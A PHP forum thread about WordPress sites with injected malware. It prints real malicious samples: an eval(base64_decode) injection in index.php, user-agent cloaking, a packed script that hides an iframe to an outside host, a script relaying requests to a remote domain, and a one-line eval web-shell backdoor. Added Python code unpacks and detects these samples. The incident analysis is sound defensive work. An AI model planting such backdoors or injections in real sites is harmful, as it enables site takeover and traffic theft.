PHP Developers Network

A community of PHP developers offering assistance, advice, discussion, and friendship.
PostPosted: Mon Nov 28, 2011 9:21 pm 
Forum Newbie

Joined: Thu Oct 06, 2011 11:34 am
Posts: 4
Hi all,

Background info:
An overseas developer working for an affiliate program also developed a lot of individual sites tied into said affiliate program for my roommate's current boss. They know they are being stolen from because of decreased revenues and suspicious activity.

They said they hired some former NSA specialist... nonsense. By no means am I proficient in security or PHP itself in the matter, but what we have discovered is encrypted PHP and JavaScript that has been injected into the index.php file on several of the sites. This line of code was not there a month ago; this was verified when current copies were compared to backups.

Any insight or help would be GREATLY appreciated. Below you can find the encoded version and the decoded version. I'm still working on decoding the JScript. My hypothesis is that somehow this former developer programmed in a back door that lets him redirect traffic from their affiliate to his personal affiliate site and collect the profits unbeknownst to the owners of the site. They are also running older, insecure versions of WordPress. I have been recommending upgrades for months now, but maybe this information will finally prompt them to act. It's not my job; I'm just doing this for a friend.

Encoded Version
<?php eval(base64_decode('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'));
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */


/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */

define('WP_USE_THEMES', true);

/** Loads the WordPress Environment and Template */
require('./wp-blog-header.php');
?>


Decoded Version
error_reporting(0);
$bot = FALSE ;
$ua = $_SERVER['HTTP_USER_AGENT'];
$botsUA = array('12345','alexa.com','anonymouse.org','bdbrandprotect.com','blogpulse.com','bot','buzztracker.com','crawl','docomo','drupal.org','feedtools','htmldoc','httpclient','internetseer.com','linux','macintosh','mac os','magent','mail.ru','mybloglog api','netcraft','openacoon.de','opera mini','opera mobi','playstation','postrank.com','psp','rrrrrrrrr','rssreader','slurp','snoopy','spider','spyder','szn-image-resizer','validator','virus','vlc media player','webcollage','wordpress','x11','yandex','iphone','android');
foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true; break;}}
if (!$bot){
        echo("<script type=\"text/javascript\">".base64_decode('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')."</script>");
}


PostPosted: Mon Nov 28, 2011 10:23 pm 
Forum Newbie

Joined: Thu Oct 06, 2011 11:34 am
Posts: 4
Decoded Javascript
eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('l n=k.r&&s.t.u("v")==-1;l o=k.p&&s.t.u("v")==-1;l w=\'C=0 D=0 E="0" F="0" G="0" H="0" I="0" J="K"\';l c=L M();c[0]="d://e.f-b.g/m.h?i=j";c[1]="d://e.f-b.g/b.h?i=j";c[2]="d://e.f-b.g/m.h?i=j";c[3]="d://e.f-b.g/b.h?i=j";c[4]="d://e.f-b.g/m.h?i=j";c[5]="d://e.f-b.g/b.h?i=j";c[6]="d://e.f-b.g/m.h?i=j";c[7]="d://e.f-b.g/b.h?i=j";c[8]="d://e.f-b.g/m.h?i=j";c[9]="d://e.f-b.g/b.h?i=j";x(n||o)k.N(\'<y O="q" z="" \'+w+\'></y>\');P A(){x(n||o){l a=k.p?k.p("q"):k.r.q;a.z=c[B.Q(B.R()*c.S)]}};T.U=A',57,57,'|||||||||||layer|randomcontent|http|www|lose|de|php|user|242873|document|var|layer2|ie|dom|getElementById|dynstuff|all|navigator|userAgent|indexOf|Opera|iframeprops|if|iframe|src|random_iframe|Math|width|height|marginwidth|marginheight|hspace|vspace|frameborder|scrolling|no|new|Array|write|id|function|floor|random|length|window|onload'.split('|'),0,{}))


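The script above is a standard p,a,c,k,e,r bundle: each identifier in the payload is replaced by its dictionary index written in base 57, and the bootstrap function swaps the words back in at load time. The following added example (not from the thread; function names, the sample bundle and the `js_unescape` helper are my own) re-implements that unpacking step in Python so the payload can be read without executing any of the JavaScript.

```python
"""Unpack a Dean Edwards style p,a,c,k,e,r payload like the one posted above.

Added example, not from the thread. Tokens are dictionary indexes written in
base `a` (0-9, a-z, then A-Z once a > 36); the bootstrap substitutes the words
back, highest index first, and this mirrors that in Python.
"""
import re

DIGITS = "0123456789abcdefghijklmnopqrstuvwxyz"

def encode_index(c: int, radix: int) -> str:
    """Python mirror of the bootstrap's e(c): the token for dictionary index c."""
    prefix = "" if c < radix else encode_index(c // radix, radix)
    d = c % radix
    return prefix + (chr(d + 29) if d > 35 else DIGITS[d])

def unpack(payload: str, radix: int, count: int, words: list[str]) -> str:
    """Replace every token in payload with its dictionary word."""
    for c in range(count - 1, -1, -1):
        # An empty slot means the token stands for itself (the bootstrap does
        # k[c] || e(c)), so there is nothing to substitute for it.
        if c < len(words) and words[c]:
            pattern = r"\b" + re.escape(encode_index(c, radix)) + r"\b"
            payload = re.sub(pattern, lambda _m, w=words[c]: w, payload)
    return payload

# Argument list of the packed call:  }('payload',a,c,'w|o|r|d|s'.split('|'),0,{}))
ARGS = re.compile(
    r"\}\s*\(\s*'((?:[^'\\]|\\.)*)'\s*,\s*(\d+)\s*,\s*(\d+)\s*,\s*"
    r"'((?:[^'\\]|\\.)*)'\.split\('\|'\)", re.S)

def js_unescape(s: str) -> str:
    """Undo the two escapes the packer emits inside its single-quoted strings."""
    return s.replace("\\'", "'").replace("\\\\", "\\")

def unpack_script(js: str) -> str:
    """Pull the arguments out of the full eval(function(p,a,c,k,e,r){...}(...)) wrapper."""
    m = ARGS.search(js)
    if not m:
        raise ValueError("no p,a,c,k,e,r argument list found")
    payload, radix, count, words = m.groups()
    return unpack(js_unescape(payload), int(radix), int(count), js_unescape(words).split("|"))

# Constructed sample in the thread's shape (bootstrap body elided): a 38-entry
# dictionary, so index 36 is token 'A' and 37 is 'B', as with the posted radix 57.
SAMPLE = ("eval(function(p,a,c,k,e,r){/* bootstrap */}('A(B.0)',57,38,'"
          "title" + "|" * 36 + "alert|document'.split('|'),0,{}))")
```

`unpack_script(SAMPLE)` returns `alert(document.title)`; feeding it the posted script instead yields the iframe-injection code the next reply describes.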
PostPosted: Tue Nov 29, 2011 1:37 am 
DevNet Resident

Joined: Wed Apr 01, 2009 1:31 pm
Posts: 1532
The PHP script appears to inject some JavaScript for visitors whose browsers do not match the list of bots. I sent you a PM containing the unobscured JavaScript. It appears to check for the presence of a cookie. If the cookie is not found, it injects a randomly-sized, randomly-positioned (off screen) iframe which links to the attacker's website. It also sets the cookie it was looking for. The cookie contains a random number and expires in one day. It is named "__umtd", which probably is meant to mimic Urchin Tracking Module cookies ("__utm*"), but has the "t" and "m" transposed for unknown reasons.


PostPosted: Wed Nov 30, 2011 1:57 pm 
Forum Newbie

Joined: Thu Oct 06, 2011 11:34 am
Posts: 4
Can anyone offer some insight on this additional malicious code I found?

<?php
eval(error_reporting(0);
function nurlget ($url) {
if (function_exists('curl_init')) {
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$out = curl_exec ($ch);
if (curl_errno($ch) !== 0) {$out = false;}
curl_close ($ch);
} else {
$out = file_get_contents($url);
}
return (trim($out));
}
$qs = $_SERVER["QUERY_STRING"];
if($qs) echo(nurlget('http://tpvggiiewv.info/index.php?'.$qs));); ?>

=malware

That's not actually the backdoor.

The back door was in a file called "google971ca75712474fb14e9d9959b9e32653.php" which contained simply:

<?php @eval(stripslashes($_REQUEST[asc])); ?>

And that alone, my friend, is the back door that allows the script to be injected into every website on the server.


PostPosted: Wed Nov 30, 2011 10:28 pm 
DevNet Resident

Joined: Wed Apr 01, 2009 1:31 pm
Posts: 1532
By "offer some insight" do you mean explain what the code does? The first script is supposed to load additional code from a remote site and execute it. As shown, it will fail because the usage of eval() is syntactically incorrect. The second script executes code submitted to it through an HTTP request.


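Three distinct indicators appear across this thread: eval() over base64_decode() prepended to index.php, an eval() over raw request input in a file named to look like a Google verification file, and User-Agent cloaking with error reporting switched off. The poster found the first one by diffing against backups. The following added example (not from the thread; rule names, function names and the sample files are my own, modelled on the posted snippets with a placeholder payload) checks a set of PHP files for those patterns and reports which files differ from a trusted backup.

```python
"""Scan PHP sources for the injection and backdoor patterns seen in this thread.

Added example, not from the original posts. Flags eval() fed by base64_decode(),
eval() fed by request input, User-Agent bot-list cloaking and silenced error
reporting, and lists files whose SHA-256 differs from a trusted backup copy.
"""
import hashlib
import re

# Rules are written from the snippets posted above, not taken from a signature feed.
RULES = [
    ("eval-of-base64", re.compile(r"\beval\s*\(\s*base64_decode\s*\(", re.I)),
    ("eval-of-request",
     re.compile(r"\beval\s*\([^;]*?\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I)),
    ("ua-cloaking",
     re.compile(r"HTTP_USER_AGENT[\s\S]{0,2000}?strpos\s*\(\s*strtolower", re.I)),
    # Weak on its own (legitimate code silences errors too); meaningful with the others.
    ("silenced-errors", re.compile(r"\berror_reporting\s*\(\s*0\s*\)", re.I)),
]

def scan_php_source(src: str) -> list[str]:
    """Labels of every rule matching the PHP source, in RULES order."""
    return [label for label, rx in RULES if rx.search(src)]

def scan_tree(files: dict[str, str]) -> dict[str, list[str]]:
    """Map path -> findings for every file that triggers at least one rule."""
    return {path: hits for path, src in files.items() if (hits := scan_php_source(src))}

def changed_files(current: dict[str, bytes], backup: dict[str, bytes]) -> list[str]:
    """Paths whose content hash differs from the backup copy or is absent from it."""
    sha = lambda b: hashlib.sha256(b).hexdigest()
    return sorted(p for p, data in current.items()
                  if p not in backup or sha(backup[p]) != sha(data))

# Constructed samples modelled on the thread's snippets; the base64 payload is a placeholder.
INJECTED_INDEX = ("<?php eval(base64_decode('PAYLOAD_PLACEHOLDER'));\n"
                  "define('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');")
CLEAN_INDEX = "<?php\ndefine('WP_USE_THEMES', true);\nrequire('./wp-blog-header.php');"
BACKDOOR = "<?php @eval(stripslashes($_REQUEST[asc])); ?>"
CLOAK = ("error_reporting(0);\n$ua = $_SERVER['HTTP_USER_AGENT'];\n"
         "foreach ($botsUA as $bs) {if(strpos(strtolower($ua), $bs)!== false){$bot = true;}}")

if __name__ == "__main__":
    site = {"index.php": INJECTED_INDEX, "google971ca75712474fb14e9d9959b9e32653.php": BACKDOOR,
            "wp-content/uploads/x.php": CLOAK, "wp-load.php": CLEAN_INDEX}
    for path, hits in scan_tree(site).items():
        print(f"{path}: {', '.join(hits)}")
    print("changed vs backup:", changed_files(
        {p: s.encode() for p, s in site.items()}, {"index.php": CLEAN_INDEX.encode()}))
```

Run the hash comparison against the clean backup first, then scan only the files it reports; the rules are a triage aid, not proof of compromise on their own.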
Powered by phpBB® Forum Software © phpBB Group